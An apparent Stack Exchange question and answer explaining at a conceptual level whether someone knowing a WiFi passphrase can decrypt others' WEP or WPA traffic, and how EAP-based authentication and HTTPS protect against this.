0

If I connect to a WiFi network sporting either WEP, WPA or WPA2 encryption, can someone other decipher my communication he passively received if he knows the network's passphrase?

dronus
  • 141
  • 2
  • Yes, they can decipher the traffic from wireless to normal Ethernet, but if you are using SSL websites and other encryption on the transport layer it doesn't give them access to that – mubix Jul 23 '16 at 17:04
  • So not one of the usual WiFi security schemes protect different users in the same network sniffing on each other? – dronus Jul 23 '16 at 17:11

1 Answers1

1

The simplified answer for home routers goes something like this:

In the case of WEP it is trivial to decrypt the traffic being transmitted over the wireless network, since the WEP key is used for encryption of packets.

In the case of WPA it is possible, but not as easy as WEP. WPA makes it harder by introducing a four-way handshake during the authentication phase. In this phase, your computer and the access point "agree" on a key which you will use to send future communications to each other. The problem is that if an attacker intercepts the handshake (and knows the pre-shared key), they can figure out what key you're using for encryption and therefore decrypt your data.

Is it possible to avoid this?

Yes. There are other authentication protocols for WPA which are not centred around a pre-shared key - too many for me to provided detailed answers on each. Have a look at "Extensible Authentication Protocol" (EAP) for more information on these.

Depending on the authentication protocol, it can become very difficult to intercept and decrypt traffic. For (an oversimplified) example, public key cryptography may be employed during key exchange in order to ensure that the handshake is properly authenticated; or Diffie-Hellman might be used to set up a an encryption key in such a way that, even if all of the handshake is sent in "clear-text", the key is not known.

These authentication protocols are commonly used in enterprise wireless setups, where a pre-shared key is obviously not sufficient for security.

Final Note: The problem you're describing is not exclusive to wireless networks. Whenever there is encrypted traffic between two entities, we must consider the security of the key exchange in determining the security of the whole system.

As was pointed out, HTTPS would be adequate to hide your traffic: even if the wireless packets can be decrypted, the content contained within the packet would be encrypted and therefore unreadable** (** not entirely true).

Further Reading:

https://crypto.stackexchange.com/questions/5927/why-does-wpa-psk-not-use-diffie-hellman-key-exchange

Four-way Handshake in WPA-Personal (WPA-PSK)

What are the difference between WPA2-PSK and WPA2-EAP-PSK?

Community
  • 1
James Lambeth
  • 311
  • 1
  • 3